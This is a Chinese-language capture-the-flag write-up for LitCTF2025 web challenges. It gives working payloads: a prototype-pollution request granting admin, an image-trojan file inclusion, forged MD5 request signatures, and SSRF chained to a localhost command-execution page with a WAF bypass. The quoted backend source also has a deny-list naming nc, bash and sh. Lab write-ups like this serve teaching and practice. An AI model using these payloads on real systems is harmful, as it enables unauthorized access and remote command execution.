LitCTF2025

多重宇宙日记

直接将isAdmin属性污染为true即可看到管理员面板
payload

POST /api/profile/update HTTP/1.1
Host: node6.anna.nssctf.cn:21396
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node6.anna.nssctf.cn:21396/api/profile
Content-Type: application/json
Content-Length: 81
Origin: http://node6.anna.nssctf.cn:21396
Connection: close
Cookie: connect.sid=s%3ACtewAuMzvsQlrpFde6TSCJip6jv0fCtY.STGeEXBPKbSz0qqpBD0pOEZCaY5PcqCCw4BYUwHzjBY
Priority: u=0

{
    "settings":{
        "theme":"1",
        "language":"1",
        "__proto__":{
		"isAdmin":true
        }
    }
}

easy_file

只能上传jpg
先传一个图片木马，然后在admin.php中用file参数包含即可

easy_signin

使用X-sign校验签名，直接根据前端的js代码自己生成签名即可

const shortMd5User = '21232f';
const shortMd5Pass = '019202';
const timestamp = '1748258425996';
const secretKey = 'easy_signin';
const sign = CryptoJS.MD5(shortMd5User + shortMd5Pass + timestamp + secretKey).toString();
console.log(sign);

去到dashboard，提示有/var/www/html/backup/8e0132966053d4bf8b2dbe4ede25502b.php
首页源代码中有api.js，访问之后给了一个路由/api/sys/urlcode.php?url=
那么通过/api/sys/urlcode.php?url=file:///var/www/html/backup/8e0132966053d4bf8b2dbe4ede25502b.php拿到源码

?php
if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
highlight_file(__FILE__);

$name="waf";
$name = $_GET['name'];


if (preg_match('/\b(nc|bash|sh)\b/i', $name)) {
    echo "waf!!";
    exit;
}


if (preg_match('/more|less|head|sort/', $name)) {
    echo "waf";
    exit;
}


if (preg_match('/tail|sed|cut|awk|strings|od|ping/', $name)) {
    echo "waf!";
    exit;
}

exec($name, $output, $return_var);
echo "执行结果：\n";
print_r($output);
echo "\n返回码：$return_var";
} else {
    echo("非本地用户");
}
?

注意到必须是本地请求，那么可以通过/api/sys/urlcode.php?url=这个接口打SSRF

/api/sys/urlcode.php?url=http://127.0.0.1/backup/8e0132966053d4bf8b2dbe4ede25502b.php?name=ls${IFS}../

发现327a6c4304ad5938eaf0efb6cc3e53dc.php，访问即可得到flag

君の名は